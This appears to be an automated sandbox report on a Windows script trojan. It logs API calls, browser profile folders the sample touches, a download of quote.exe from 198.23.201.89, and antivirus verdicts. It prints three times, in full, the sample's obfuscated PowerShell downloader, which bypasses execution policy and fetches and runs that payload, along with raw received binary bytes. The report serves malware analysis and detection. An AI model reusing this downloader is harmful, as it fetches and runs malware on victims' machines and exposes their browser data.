stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ada000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04adb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04adc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04add000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ade000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04adf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description netbtugc.exe tried to sleep 163 seconds, actually delayed analysis time by 163 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\quote.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\quote.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received Áè@ҋÁ+ÂuAù')|ݸ?Å%C÷îÁú‹òÁîòuí‹M ‹u¶0¶A0F¶A0F¶A0F덤$¸ó§-4÷ïÁú‹úÁïúuí‹_^]Ãñ™U·¿K-U‹ìƒì¹kS3ۋÿ¸8pà÷éÑÁú‹ÊÁéÊuë3À‰Eø9E†ã‹MƒÁV‰MðW‹ÿE ¿vW‰E슈Eÿ¹$¾§»çb¸d4L÷ïÁú‹úÁïúuí¸¶¾ ÷éÁú‹ÊÁéÊuí‹Uþ‚¶‚zø¶‚ ¶Áˆ‚ ¶ÀƒÀÂPW‰Eôè!ƒÄ¸D&¹öd$;ñLñHuø‹EôŠ¸…ëQ÷ëÁú‹ÚÁëÚuí¶Á‹MðŠ2Eÿ‹M숋Eø@‰Eø;E‚,ÿÿÿ_^C‹Ã%€yHƒÈø@uCû”/|æ[‹å]çÈéhó,!ÏПìU‹ì‹M3À8t d$@€<uù@Pÿu Qè¾òÿÿƒÄ ]ÃF!ÇdRëåÕØU‹ì‹M3Àf9t I@fƒ<AuøEPÿu Qè‡òÿÿƒÄ ]ÃÌÌU‹ìjÿuèÃ÷ÿÿƒÄ…Àt‹@]Ã3À]à ¸U‹ì‹M WŠ‹}„ÀtV‹Ñ‹÷f˜Rf‰Šv„Àuï^3À8t I€|@uö3Éf‰ G_]Ã(!Ÿ9ÖýÂ6?áõ:U‹ì‹U ‹EV‹u…ö~W‹ø+úŠ Nˆ R…öó_^]ØçóY8YæßÃU‹ì‹M…Ét¶E iÀV‹ñW‹}Áéó«‹Îƒáóª_^‹E]ÃÌÌé«ûÿÿš»Ü¡Å/௑-U‹ìQV‹u…öu3À^‹å]À~u2ƒ~ÆFt èèúÿÿ¯FëèÝúÿÿ‰FÇF@]ÇF b"ÇF *@‹N‹Ñ‹Á%€ÿÿÁê3ЋF5Aýÿÿ#Á‹NÁàSÁê3ЋًÁÁèã>3؋F$5A}G#Á‹N ÁàWÁë3؋ù‹Á%ÿÁï 3ø‹F5A}Gÿ#Á‰V‰^ÁàÁï3ø‰~ ‰Uü‹V ‹òÁî‹Â%þÿ3ð‹EÁî ‹H(ñA}ÿÿ#ÊÁá 3ñ‰p 3÷3ó3uü_Ñî[‹Æ^‹å]ÃÌU‹ìSV‹uWdžØdž̿‚¸ødž칂¸ødž䱂¸ødžðÁ‚¸øÆÈVè¹þÿÿƒÄŠÈd$¶Á;E r ;E†î…öu3Éëç€~u2ƒ~ÆFt è’ùÿÿ¯Fëè‡ùÿÿ‰FÇF@]ÇF b"ÇF *@‹N‹Ù‹Á%€ÿÿÁë3؋F5Aýÿÿ#Á‹NÁà‹ùÁë3؋ÁÁèç>3ø‹F$5A}G#Á‹N Áà‹ÑÁï3ø‹Á%ÿÁê 3ЋF5A}Gÿ#Á‹N ÁàÁê3ЋÁÁè‰E‹Á%þÿ1E‹F(Ám 5A}ÿÿ#Á‹MÁà 3ȉN 3Ê3Ï3ˉ^‰~‰V Ñééÿÿÿ_^ŠÁ[]Ã4xW(ãƒNÙU‹ì‹M ‹UŠSŠˆˆ[]èY™Ðxpã±F;XP̆H£€ÑÂbÀžVwN¹üÎÃÑu쮂€PÂ^lå ó÷ÉÍÅe1éÈíØìÙÈëx« Îúx #‘*,>uÈ'Mè å5›Ãá(–š‘ã@hE™‰÷ gýmNKóCtÍ3Ãu,±wzPÌEP|FFn0mFY“ey>ÁË8e*ÈîÖÍD@»>”ùƒ bëúXÖó+qîà¢R·–ûcyÂíó”þùþ˜lş†_¹^†9'׃L£oÆ|Z.®Ò ’§>PÅ¥>îft¯0ýèÙm`uSâ@~:¡ÊØ‹× fTk#õ+{2ÏyQï8S₥È3 ‘á y@<H¯9—„¥Ád(îÊJM¤Fù[s§„Ñäo²ù&,**y'Lê¼H”¡­;—1^§t.,–Ñ©ï´Fw¬1H€j;*Lïjs‚aá%ÃŜÜ'ú;68žšäiç¿æžpí6…aý-Þ¿®° »d9Úgbœìråƫҍ&çPj±%Xg0÷x‘„MUÅGÝ Q7‡,6U=µˆsô§>»¿Šä* oU˜c -*ÀÀ+tó”¾Ö4w¸à•Ìwg‘H³9iž1¶î=t/€7üq‘é`ÿÝæ¨á¶·yÑó¿úˆÇ=æN“»ßg¶]¥¤—X¦û0g0¹2?*u²Ìž4”m¶Vcóv‰R‹sWE±ÇK(€ÅzÜ>8E)$N/xï‘=t$¿Ü‡Œ"ÂréÐ* hµ7ó§“@o¾’,ë,Ϝ{§ârNåX¡°dœõŒ~ä¬#ž¶U\Þ­ëÈ#|§{ú 8%°§Ò‡·£Ê6ŽwþN°™~7MÊÒ|M.È7‹«Vöz ô‹TÃÂSSøÃ-KfÏÄlQ3gk&·c©i;ê 5G=ŸßòOƒ1L+ÃÌOH!¨º;»j½0²’Ÿ$žd ©¼û(©ª0ÈØ/¶:ÐÅÐ+8ÓAægÑTÅĪ~Q€3Ò_Áš‘KltŒ.¨'¨^ÞoTs#zóƐ˜G›ù'€õD!ól˜r’<ÿÌüîÓ)WÆZkNl…“¡ u'Ⱦ¤{Áþ!…°QBL ‰‹Œk`³Mˆ=ŠdÅbMý•­°¹òÜFKP!ªâÄõAŽÀ™ëk¦|Kc°çÄ—cD›žtUiÅ(Ž˜ÉUH’ (@ ¤m1NY̓!‰ÿîâí?É>ݽ>„¾Ò›§L¢hž¸úÑs\ʀöÊC¿`Rß0FÞ·ä„ß6š}5ÑØÈ/(H_Ð{<ÍteòÞËSaDG'ݯÛKë/g aUxB-‡Îþ€õKÀÃðHß ÝÙxòkõè;ëoÅCˆ¥RRi¾¢("ƒ¢à֞ÿ T«^Är ²ë›/rç‹êÀè:¾Ë ç )GH2Ôa¥.ò&+ó⎉Û-¥ÙÜ©o®©åŸŒ 9iÿ(!+ k¡­­o†©9[NY)?ú»ØZº£6¸…¦ a/9ŒaâÁ0RýUºFöþùÛ'F„Œ2¿SÓ1­#òàîT¯kÀ5‚”q¬©ÖÿTÛs}—N‘÷ÛúU b ™†ÜàsëJn¯ÐÊ;˜šŒÊtêóá§àœav¤¤ØÃåV}ò4–gñƒ¥×›´Tòx›êY`ZFæÄ0æmkAfä¦;ÿ/ $tÇL3Œ¡/Â' } ` :òT<>ŠX,ð/½t~9ìóµ`;ÈÙ#3˜®ÌÙ1îǎß*w(Î0}N81nbÈ,ÀiÓ6·séîã7„<&a÷éö ^/“Ÿ@¡† >ׂKÔjJˆ{BÔôïÛ½—V˜~Æz„À¦wE°ÙÃڑá~n˜Ó˜Ú5Vh°=Bsg/Y¼þ:j^BZ[۝³–[•KÓry.‰“; G£ãL€7:‚[T²¾‡´§?'o2E—š¥ã ‡DŽ¸œ|eÎiG»‘:»N¸´ËqçeãT¡2Äw–Æéκ­~ktI'¡•,WXåh‚/ÏÁ øÎS®Z6—ó4=IBð o5,<¸|´…7^’ü'ºL. Çp»Öâ—%¦»‘ãVÚ+|`çéò´ÞÈ3žän…ÒOH\+ÙBößá‘'èR>HS6¬@QwŠŠ}™ŒµVŠŒDBÕÞüÁŒ„K–צBl8OƒÕp"L’.A3¾û½æ;¢õ–1x‘qñI"ÃY|ìMªüµéˆöNªqƒ–€õV+C·E¦} zÑï­îyou”Nö¯rGǝ«¤¯ãìûJgg1Ò6·á«|OgtCBæxqíÅTì,œ`×ž!T|ð甊2=€çʊ™Ä;{9_xÄE¶}‚Œn Í>ÎbúŒâåæ6ˆŠ¿àX<â6Jq[xL{± Áécá«$>ô¿‡ÔKw/Xž¹ò{£lDîT}§ÐÈþ\•Óm€I/ÜÁa¡[ûá„p$ñFïÆäÝTvÁé¹%7‡˜ä‚DÃ}=8AXAu;?.‰\slà?Ð*èGÅxü©š|TL¥ÝiRÀÒ_ןZ,á5Fš÷åÿð[ÙVŸWQSw 8]^Ž³¨…÷Yq¨õ׍®ë# |CÑXaïüuÒPÐé‡7àÅÌ_çq-Y’äÎ8 à+˜ŒÃ~®ë팋\ Í`Y¯ì+ŋ+K‰ã
Data sent GET /warm/quote.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 198.23.201.89
file C:\Users\test22\AppData\Local\AVAST Software\Browser\User Data
file C:\Users\test22\AppData\Local\AVG\Browser\User Data
file C:\Users\test22\AppData\Local\Temp\quote.exe
Time & API Arguments Status Return Repeated

send

buffer: GET /warm/quote.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive
socket: 1440
sent: 77
1 77 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\quote.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\quote.exe
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
Lionic Trojan.Script.Valyria.a!c
Cynet Malicious (score: 99)
Skyhigh HTA/Downloader.f
ALYac VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
VirIT Trojan.HTA.Dwnldr.DZP
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
Kingsoft Win32.Infected.AutoInfector.a
Arcabit VB:Trojan.Valyria.D1D3A
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
Tencent Script.Trojan-Downloader.Generic.Zchl
MAX malware (ai score=80)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]
file C:\Users\test22\AppData\Local\Temp\quote.exe